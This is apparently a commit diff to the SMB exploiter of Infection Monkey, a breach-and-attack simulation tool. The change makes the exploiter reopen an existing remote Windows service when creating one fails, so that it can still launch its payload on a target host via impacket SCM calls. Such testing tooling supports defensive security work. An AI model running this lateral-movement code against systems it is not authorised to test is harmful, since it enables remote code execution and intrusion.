Agent: Handle case where SMB service already exists in SMBExploiter

2022-03-18 12:25:45 -04:00 · 2022-03-18 12:25:45 -04:00 · 75dd26b3df
parent abb05730b8
commit 75dd26b3df
1 changed files with 17 additions and 7 deletions
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@ -1,6 +1,7 @@
 from logging import getLogger

 from impacket.dcerpc.v5 import scmr, transport
+from impacket.dcerpc.v5.scmr import DCERPCSessionError

 from common.utils.attack_utils import ScanStatus, UsageEnum
 from infection_monkey.exploit.HostExploiter import HostExploiter
@ -128,13 +129,22 @@ class SMBExploiter(HostExploiter):
        sc_handle = resp["lpScHandle"]

        # start the monkey using the SCM
-        resp = scmr.hRCreateServiceW(
-            scmr_rpc,
-            sc_handle,
-            SMBExploiter.SMB_SERVICE_NAME,
-            SMBExploiter.SMB_SERVICE_NAME,
-            lpBinaryPathName=cmdline,
-        )
+        try:
+            resp = scmr.hRCreateServiceW(
+                scmr_rpc,
+                sc_handle,
+                SMBExploiter.SMB_SERVICE_NAME,
+                SMBExploiter.SMB_SERVICE_NAME,
+                lpBinaryPathName=cmdline,
+            )
+        except DCERPCSessionError as err:
+            if err.error_code == 0x431:
+                logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
+                resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
+            else:
+                self.exploit_result.error_message = str(err)
+                return self.exploit_result
+
        service = resp["lpServiceHandle"]
        try:
            scmr.hRStartServiceW(scmr_rpc, service)